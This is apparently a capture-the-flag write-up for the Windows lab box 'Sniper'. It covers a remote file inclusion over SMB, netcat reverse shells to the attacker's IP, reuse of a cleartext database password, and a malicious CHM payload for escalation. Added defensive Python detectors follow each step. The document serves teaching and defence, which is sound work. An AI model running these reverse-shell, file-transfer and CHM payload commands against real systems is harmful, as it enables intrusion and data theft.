# Sniper

![Sniper](/files/-M3WZ1N3DC5YP7iHuC6x)

Sniper is a medium-difficulty Windows box that is attacked through web-based exploits.

## Recon

We start off by scanning Sniper's IP `10.10.10.151` with `nmap`:

```
nmap -T4 -A -v 10.10.10.151
```

From our results we get the following open ports and services:

```
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Supported Methods: GET POST
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
```

Port 80 is open, so the box must be hosting a website; navigating to `http://10.10.10.151:80` confirms exactly that.

For the most part we find nothing exceptionally interesting, except one particular URL: `http://10.10.10.151/blog/?lang=blog-en.php`. The `?lang=` parameter indicates that the page may be vulnerable to remote file inclusion (`RFI`), but on its own that gives us no way of getting a shell. Looking at our nmap scan again, SMB is also open on the target, so we can use this to make the box fetch files from an SMB share of ours.

```
apt-get install samba
mkdir -p /tmp/sniper/smb    # directory we will share with the target
chmod 777 /tmp/sniper/smb
```

To allow anonymous access we have to make some changes to our SMB config, which we can find at `/etc/samba/smb.conf`; at the end of the file we add:

```
[pizza]
comment = Samba on Ubuntu
path = /tmp/sniper/smb
read only = no
browsable = yes
guest ok = Yes
```

Also make sure that the `smb` folder has the correct permissions (the `chmod 777` above).

For these changes to take effect we have to restart the SMB service, which we can do with `service smbd restart`.

Windows doesn't natively come with `netcat`, so we have to download it and host it ourselves. We can get it from <https://eternallybored.org/misc/netcat/> and place `nc.exe` in our SMB share folder.

Once we have this, we start a local `netcat` listener:

```
nc -lnvp 8888    # listener for the reverse shell
ifconfig tun0    # get our VPN IP
```

Perfect, the target can now connect back to our machine. Now to trigger the `RFI` vulnerability, we place the following `pizza.php` in the SMB share:

```
<?php
// run nc.exe from our SMB share and connect back to our listener with a PowerShell shell
$answer = system('\\\\10.10.15.32\\pizza\\nc.exe 10.10.15.32 8888 -e powershell.exe');
echo $answer."<br/>";
?>
```

and then request it through the vulnerable parameter:

```
http://10.10.10.151/blog/?lang=\\10.10.15.32\pizza\pizza.php
```
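From the defender's side, the same `lang` parameter is visible in the IIS logs. The following is an added example (not part of the original write-up) that parses constructed IIS W3C log lines and flags `lang` values that point at a UNC path, a URL, a traversal sequence, or anything outside a constructed allowlist of legitimate language pages; it goes beyond the UNC case used above to cover the other inclusion variants as well.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed IIS W3C log excerpt (not real logs from the box). The third request has the
# shape of the one used in the write-up; the others are benign or other include variants.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2019-04-11 09:00:01 10.10.10.151 GET /blog/ lang=blog-en.php 80 - 10.10.14.32 Mozilla/5.0 200
2019-04-11 09:00:05 10.10.10.151 GET /blog/ lang=blog-fr.php 80 - 10.10.14.32 Mozilla/5.0 200
2019-04-11 09:01:10 10.10.10.151 GET /blog/ lang=\\\\10.10.14.32\\pizza\\pizza.php 80 - 10.10.14.32 Mozilla/5.0 200
2019-04-11 09:02:22 10.10.10.151 GET /blog/ lang=http://10.10.14.32/shell.txt 80 - 10.10.14.32 Mozilla/5.0 500
2019-04-11 09:03:33 10.10.10.151 GET /blog/ lang=..%5C..%5Cwindows%5Cwin.ini 80 - 10.10.14.32 Mozilla/5.0 200
"""

# Constructed allowlist: the only values the blog is meant to accept for ?lang=
ALLOWED_LANG = {"blog-en.php", "blog-fr.php"}


def classify_lang(value):
    """Return a reason string if a (possibly still URL-encoded) lang value looks like an include attack."""
    v = unquote(value)
    if v.startswith("\\\\") or v.startswith("//"):
        return "UNC path (remote include over SMB)"
    if re.match(r"^[a-z][a-z0-9+.-]*://", v, re.I):
        return "URL (remote include over HTTP)"
    if ".." in v or "/" in v or "\\" in v:
        return "path traversal"
    if v not in ALLOWED_LANG:
        return "not in allowlist"
    return None


def find_include_attempts(log_text):
    """Scan W3C log lines and return one dict per suspicious ?lang= request, in log order."""
    hits = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue  # skip blank lines and directives such as #Fields
        fields = line.split(" ")
        if len(fields) < 11:
            continue  # not the field layout we expect; skip rather than guess
        date, time_, _sip, _method, stem, query, _port, _user, client_ip = fields[:9]
        # parse_qs URL-decodes values and yields nothing for the '-' IIS writes when no query exists
        for val in parse_qs(query, keep_blank_values=True).get("lang", []):
            reason = classify_lang(val)
            if reason:
                hits.append({"time": f"{date} {time_}", "client": client_ip,
                             "stem": stem, "lang": unquote(val), "reason": reason})
    return hits
```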

Once our session is up and running we can look around for ways to escalate to a user shell. Looking into `C:\Users\` we find a user called `Chris`:

```
    Directory: C:\users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         4/9/2019   6:47 AM                Administrator
d-----        4/11/2019   7:04 AM                Chris
d-r---         4/9/2019   6:47 AM                Public
```

Since a site is being served, we should check its web root, which in this case is `C:\inetpub\wwwroot`. Under it we find a directory called `user`, and inside it `db.php`, which contains a database connection with the password in clear text: `36mEAhz/B8xQ~2VM`. We can safely assume that this is also the user's credential.

```
<?php
// Enter your Host, username, password, database below.
// I left password empty because i do not set password on localhost.
$con = mysqli_connect("localhost","dbuser","36mEAhz/B8xQ~2VM","sniper");
// Check connection
if (mysqli_connect_errno())
  {
  echo "Failed to connect to MySQL: " . mysqli_connect_error();
  }
?>
```
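The lesson for the defender is that the web root should never hold secrets in clear text. As an added example (not code from the write-up or from the box), the following Python scan walks a web root for `mysqli_connect(...)` calls whose password argument is a non-empty string literal; the sample files are constructed in a temporary directory and the password in them is a placeholder, not the one above.

```python
import os
import re
import tempfile

# Constructed files: one shaped like the db.php found in the write-up (placeholder password),
# one that reads its secrets from the environment instead, and one unrelated page.
SAMPLE_FILES = {
    os.path.join("user", "db.php"): '<?php\n$con = mysqli_connect("localhost","dbuser","EXAMPLE-pl4ceholder","sniper");\n?>',
    "config.php": '<?php\n$con = mysqli_connect(getenv("DB_HOST"), getenv("DB_USER"), getenv("DB_PASS"), getenv("DB_NAME"));\n?>',
    os.path.join("blog", "blog-en.php"): '<?php include "db.php"; ?>',
}

# host, user, then a quoted password literal (double or single quotes, escapes allowed), then a comma
MYSQLI_RE = re.compile(
    r'''mysqli_connect\s*\(\s*([^,]+),\s*([^,]+),\s*("(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*')\s*,''')


def find_hardcoded_db_creds(webroot):
    """Return (relative path, db user, password length) for each literal, non-empty password found."""
    findings = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in sorted(files):
            if not name.lower().endswith((".php", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                src = fh.read()
            for m in MYSQLI_RE.finditer(src):
                password = m.group(3)[1:-1]  # strip the surrounding quotes
                if password:  # an empty literal is a weak-auth finding, not a leaked secret
                    user = m.group(2).strip().strip("\"'")
                    findings.append((os.path.relpath(path, webroot), user, len(password)))
    return sorted(findings)


def scan_constructed_webroot():
    """Write the constructed files into a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        for rel, content in SAMPLE_FILES.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(content)
        return find_hardcoded_db_creds(root)
```

The password itself is deliberately not returned, only its length, so the report can be shared without re-leaking the secret.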

Now that we have user credentials, it's time to log in as that user.

## Exploit

We can locally escalate to the user with the credentials we have and execute our payload. To do this from PowerShell, we first start another listener:

```
nc -lnvp 6464 #local listener
```

Huge thanks to @[3r3bu5](https://3r3bu5.github.io/) for this tip

```
$user = "sniper\Chris"   # save a variable for Chris as the user
$password = ConvertTo-SecureString "36mEAhz/B8xQ~2VM" -AsPlainText -Force   # wrap the plain-text password in a SecureString
$credential = New-Object System.Management.Automation.PSCredential ($user, $password)   # create a PS credential object for Chris with the db password
Invoke-Command -ComputerName localhost -ScriptBlock { \\10.10.14.170\pizza\nc.exe 10.10.14.32 6464 -e powershell.exe } -Credential $credential   # run nc from our smb share in the context of Chris
```

Now that we have a shell as Chris we can get our first flag:

```
cd ../Desktop
cat user.txt
```

## Post Exploitation

Now that we have user we can dig around for root.

Exploring `C:\` reveals a directory called `Docs`; opening it gives us two files:

```
    Directory: C:\Docs


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/11/2019   9:31 AM            285 note.txt
-a----        4/11/2019   9:17 AM         552607 php for dummies-trial.pdf
```

Getting the output of `note.txt` shows us:

```
Hi Chris,
        Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.

Regards,
Sniper CEO.
```

Yikes! Looks like the CEO isn't too happy with us.

Let's continue digging around. Checking Chris's Downloads directory shows us an `instructions.chm`, which looks interesting; let's swipe it and have a look.

We can use `certutil` to encode the file in base64, which makes it much easier to transfer:

```
certutil -encode "instructions.chm" instructions.chm.txt
```

and to transfer it we use netcat yet again:

```
nc -lp 1234 > instructions.chm.txt                                              # on our machine: receive the file
cat instructions.chm.txt | \\10.10.14.32\pizza\nc.exe -w 3 10.10.14.170 1234    # on the target: send it
```

Now we can head over to a Windows machine to decode and open our `instructions.chm`:

```
certutil -decode instructions.chm.txt instructions.chm
```

![](/files/-M3_wjeo5_L1DdybmQAF)

Yikes, definitely a lot of bad blood here.

Fortunately it gives us a hint. Going back to the CEO's note, he said he was waiting for the documentation. Given that Chris created this file, it stands to reason that the documentation is expected as a `.chm`. Googling around we find that compiled HTML Help (`.chm`) files can be abused to run commands when they are opened.

Going back to Windows, we have to create the CHM with [HTML Help Workshop](https://www.microsoft.com/en-us/download/details.aspx?id=21138).

Once we have the workshop set up we need to create a new project in it. Then we create an HTML file containing our payload:

```
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
  <PARAM name="Command" value="ShortCut">
  <PARAM name="Button" value="Bitmap::shortcut">
  <PARAM name="Item1" value=',cmd.exe, /c type C:\Users\Administrator\Desktop\root.txt > C:/pizza/root.txt,'>
  <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
  x.Click();
</SCRIPT>
```

and edit the `.hhp` to include our malicious `html`:

```
[OPTIONS]

[FILES]
Untitled1.htm
```

and compile. Once we have our `chm` we can transfer it over to the victim; to do this we use `SimpleHTTPServer`:

```
python -m SimpleHTTPServer 8088                                                    # on our machine, in the directory containing the payload
Invoke-WebRequest http://10.10.14.32:8088/pizza.chm -OutFile C:/Temp/pizza.chm     # on the target: download the payload
```

Great, but now how do we get root? Well, the CEO did also say to "drop it here", so let's copy our malicious `chm` to `C:\Docs` and hope for the best:

```
cp pizza.chm C:\Docs\
```

And voilà, after a minute or so we should have our root flag at the path the payload writes to (`C:/pizza/root.txt` in the payload above), or a session if you built the payload that way.
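From the detection side, the chain above shows up as `hh.exe` (the HTML Help viewer) spawning a command interpreter. The following is an added example (not from the write-up) that runs a simple parent/child rule over constructed Sysmon-style process-creation events; the field names follow Sysmon Event ID 1 (`Image`, `ParentImage`, `CommandLine`, `User`) and all event values are invented.

```python
# Constructed process-creation events in the shape of Sysmon Event ID 1 (values are invented):
# a benign help file, the dropped pizza.chm being opened, the cmd.exe it spawns, and an unrelated cmd.exe.
SAMPLE_EVENTS = [
    {"ts": "2019-04-11T09:40:01", "User": "SNIPER\\Chris",
     "Image": r"C:\Windows\hh.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\hh.exe" C:\Docs\help.chm'},
    {"ts": "2019-04-11T09:41:10", "User": "SNIPER\\Administrator",
     "Image": r"C:\Windows\hh.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\hh.exe" C:\Docs\pizza.chm'},
    {"ts": "2019-04-11T09:41:11", "User": "SNIPER\\Administrator",
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\hh.exe",
     "CommandLine": r"cmd.exe /c type C:\Users\Administrator\Desktop\root.txt > C:\pizza\root.txt"},
    {"ts": "2019-04-11T09:42:00", "User": "SNIPER\\Chris",
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe"},
]

# Interpreters and proxy-execution binaries the help viewer has no business launching
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                       "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
HELP_VIEWER = "hh.exe"


def basename(image):
    """Case-insensitive file name of a Windows image path (works on any host OS)."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_chm_execution(events):
    """Return one alert per process that hh.exe spawned and that is in the suspicious list."""
    alerts = []
    for ev in events:
        if basename(ev["ParentImage"]) != HELP_VIEWER:
            continue
        child = basename(ev["Image"])
        if child in SUSPICIOUS_CHILDREN:
            alerts.append({"ts": ev["ts"], "user": ev["User"], "child": child,
                           "cmdline": ev["CommandLine"],
                           "technique": "Compiled HTML File (MITRE ATT&CK T1223, now T1218.001)"})
    return alerts


def chm_opened_from(events, directory):
    """Secondary signal: hh.exe launched with a .chm that lives under a watched drop directory."""
    prefix = directory.rstrip("\\").lower() + "\\"
    return [ev for ev in events if basename(ev["Image"]) == HELP_VIEWER
            and prefix in ev["CommandLine"].lower() and ".chm" in ev["CommandLine"].lower()]
```

The parent/child rule is the high-confidence signal; the drop-directory rule is noisier and is better used to enrich the alert with which file was opened and by whom.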

## Useful Links

{% embed url="<https://attack.mitre.org/techniques/T1223/>" %}

{% embed url="<https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1>" %}


